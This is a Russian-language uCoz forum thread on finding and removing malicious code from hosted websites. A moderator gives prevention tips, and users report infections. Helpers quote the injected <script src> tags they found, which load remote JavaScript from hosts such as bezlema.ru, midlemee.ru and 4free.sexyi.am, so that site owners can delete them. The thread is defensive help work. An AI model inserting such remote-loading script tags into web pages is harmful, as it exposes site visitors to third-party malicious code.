Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    MrKataR
    Сообщений: 3
    Репутация: 0

    Сообщение # 1606 | 12:57:41 10 Ноя 2014
    Здравствуйте. Очень нужна Ваша помощь. У меня проплаченый сайт в Юкоз.
    http://www.elsoshvar.com Проблема заключается в том, что при заходе на сайт играет (но не сразу) музыка и диалоги из мультика "Маша и медведь". Происходит данное явление только на главной. Такая проблема наблюдается с браузеров Яндекса, Оперы, Хрома как под логином, так и под гостем. Проверка на вирусы ничего не дает. Заходил с разных компьютеров. На сайте своя атмосфера, которая расстворяется благодаря этому "радио". Иногда оно молчит, что удивительно. Сам найти ничего не могу. Очень жду помощи в решении проблемы.
    Заранее благодарен.
    _CrySiS_
    Сообщений: 464
    Репутация: 38

    Сообщение # 1607 | 14:19:06 10 Ноя 2014
    Цитата MrKataR ()
    Здравствуйте. Очень нужна Ваша помощь. У меня проплаченый сайт в Юкоз. http://www.elsoshvar.com Проблема заключается в том, что при заходе на сайт играет (но не сразу) музыка и диалоги из мультика "Маша и медведь". Происходит данное явление только на главной. Такая проблема наблюдается с браузеров Яндекса, Оперы, Хрома как под логином, так и под гостем. Проверка на вирусы ничего не дает. Заходил с разных компьютеров. На сайте своя атмосфера, которая расстворяется благодаря этому "радио". Иногда оно молчит, что удивительно. Сам найти ничего не могу. Очень жду помощи в решении проблемы.
    Заранее благодарен.
    Сразу первое что попалось:
    
    Код
    <script language="javascript" src="1.ru/?t=br&noadult=1&pid=33918"></script>
    Что это? Самое первое после <html>
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1608 | 18:17:54 10 Ноя 2014
    MrKataR, вы сами залили к себе на сайт вредоносный код в большом количестве

    удалить из бесполезного переводчика сайта скрипты

    Код
    <script src="http://var.3dn.ru/LangScript2/tsed.js" type="text/javascript"></script>

    и
    Код
    <script type="text/javascript" src="http://var.3dn.ru/LangScript/png.js"></script>  

    далее из просилки денег на кошелек удалить скрипт

    Код
    <script type="text/javascript" src="http://var.3dn.ru/Donate/border.js"></script>



    далее в скрипте http://var.3dn.ru/js/ls.js присутствует сторонняя глупейшая вставка

    Код
    <nofollow><script language='JavaScript' src='http://4free.sexyi.am/pm.js'></script></nofollow>


    на будущее. воздержитесь от сбора скриптов в сомнительных местах. и тем более воздерживайтесь заливать скрипты к себе на сайты, если вы не понимаете как они работают и для чего они нужны. вы сами заражаете свой сайт
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    MrKataR
    Сообщений: 3
    Репутация: 0

    Сообщение # 1609 | 23:49:13 12 Ноя 2014
    _CrySiS_,, webanet, спасибо вам большое за помощь. Теперь разберусь, благодаря Вам.
    i123net
    Сообщений: 1
    Репутация: 0

    Сообщение # 1610 | 12:29:25 15 Ноя 2014
    подскажите как извавится от скрипта нашел drweb
    adj?ref=&tz=-360&fl=15&pos=atf&frl=0&ord=4640624728053808&w=468&h=60&s=95262
    SCRIPT.Virus
    http://ads.betweendigital.com/adj?ref=&tz=-360&fl=15&pos=atf&frl=0&ord=4640624728053808&w=468&h=60&s=95262
    делаю как написано дизайн - Быстрая замена - ничего не находит .
    просьба помогите сайт http://ium.ucoz.org/

    Добавлено (15 Ноя 2014, 12:29:25)
    ---------------------------------------------
    на втором моем сайте тоже самое http://aboook.ucoz.kz/ прошу помогите

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1611 | 18:27:49 15 Ноя 2014
    i123net, это код рекламного баннера ucoz. отключается платно. инструкции тут http://manual.ucoz.net/board/36-1-0-370

    на счет доктора веба и его детектов. //forum.ucoz.ru/forum/45-66030-1 он иногда реагирует на рекламу. причем реагирует не на содержание, а на саму конструкцию
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    -МыХ-АдМыН-
    Сообщений: 1
    Репутация: 0

    Сообщение # 1612 | 22:42:19 16 Ноя 2014
    Здравствуйте!
    Пожалуйста помогите удалить вируса.
    Сайт: http://uz-kino.com/
    Ативирус : Yandex Safebrowsing, Dr.Web ,avg
    Браузер: Google Charome ,Mozilla Firefox
    McAfee SiteAdvisor Ссылка
    Сообщение отредактировал -МыХ-АдМыН- - Воскресенье, 16 Ноя 2014, 22:47:38
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1613 | 23:18:23 16 Ноя 2014
    -МыХ-АдМыН-, рекламу проредите на сайте и все будет хорошо. убрать обязательно

    Код
    <script type="text/javascript" src="//more427.net/red.php?s=2024957088"></script>


    и самое главное это

    Код
    <script language='javascript' charset='UTF-8' type='text/javascript' src='http://bezlema.ru/5juc29di87s6pf0b2bwidv7p6nuqornrfrbdlc2exq'></script>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Юріївна
    Сообщений: 1
    Репутация: 0

    Сообщение # 1614 | 11:15:04 18 Ноя 2014
    Помогите, пожалуйста бороться с рекламными баннерами. Сайт образовательный, а появляются баннеры на тематику 18+.
    http://marusich.ucoz.ru/
    Спасибо огромное!!!!
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1615 | 19:18:28 18 Ноя 2014
    Юріївна, панель управления - дизайн - управление дизайном - глобальные блоки - первый контейнер - из блока с меню удалить скрипт

    Код
    <script language='javascript' charset='UTF-8' type='text/javascript' src='http://midlemee.ru/7mo8xdmgm547v16op9zm6s15coy871hx'></script>


    после удаления сменить пароль uid профиля. инструкция тут //forum.ucoz.ru/forum/45-52299-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Ta-ta
    Сообщений: 57
    Репутация: 1

    Сообщение # 1616 | 20:29:06 24 Ноя 2014
    Здравствуйте!
    Подскажите плиз. Сегодня заметила, что сайт очень долго стал грузиться, при этом внизу написано Ожидание ответа от js.stats.de...
    Сайт http://www.fotoretusche-welt.com/index/start/0-70 и и здесь тоже http://de.fotoretusche-welt.com/
    Что это может быть? Такого никогда не было. Все открывалось всегда очень быстро.
    ________________________
    отбой. Нашла какую-то фигню в коде, стерла. Теперь все ок.
    www.fotoretusche-welt.com
    www.deutsch-kompakt.info
    Сообщение отредактировал Ta-ta - Понедельник, 24 Ноя 2014, 20:36:41
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1617 | 20:35:44 24 Ноя 2014
    Ta-ta, панель управления - редактор страниц - управление страницами сайта - старт - напротив старта жмите на разводной ключ - страница откроется на редактирование - в самом верху содержимого убирайте

    Код
    <script language="JavaScript" src="http://js.stats.de/j/0000109832"></script>
    <script language="JavaScript">
    rapidstats(109832);
    </script>
    <noscript>
    <a href="http://www.stats.de" target="_blank">
    <img src="http://srv1.stats.de/l/0000109832?js=0" border="0" alt="">
    </a>
    </noscript>
    это по сайту http://www.fotoretusche-welt.com/index/start/0-70

    тоже самое для второго сайта, только для главной. удаляем

    Код
    <!– Статистика –>
    <script language="JavaScript" src="http://js.stats.de/j/0000109817"></script>
    <script language="JavaScript">
    rapidstats(109817);
    </script>
    <noscript>
    <a href="http://www.stats.de" target="_blank">
    <img src="http://srv1.stats.de/l/0000109817?js=0" border="0" alt="">
    </a>
    </noscript>
    <!– Конец статистики –>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ๖ۣۜStsepelin
    Сообщений: 23
    Репутация: 0

    Сообщение # 1618 | 09:16:15 28 Ноя 2014
    Всем привет!
    По данным Yandex'а мой сайт cs-orenda.ru заражен вирусом а google пишет что вирусов нет как и все антивирусы, помогите исправить это. Может Яндекс с каким то скриптом в конфликте помогите найти
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1619 | 11:33:53 28 Ноя 2014
    ๖ۣۜStsepelin, удалить скрипт

    Код
    <script language='javascript' charset='UTF-8' type='text/javascript' src='http://chat.cs-orenda.ru/5juc29di8t755ycr6o7lecwdzg8zyvp'></script>
    после удаления отправить сайт на перепроверку яндексу.
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    ๖ۣۜStsepelin
    Сообщений: 23
    Репутация: 0

    Сообщение # 1620 | 17:52:30 08 Дек 2014
    Цитата webanet ()
    после удаления отправить сайт на перепроверку яндексу.

    Все ссылки прошли проверки кроме одной http://cs-orenda.ru/forum/9 хоть и я удалил этот форум, что делать?
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: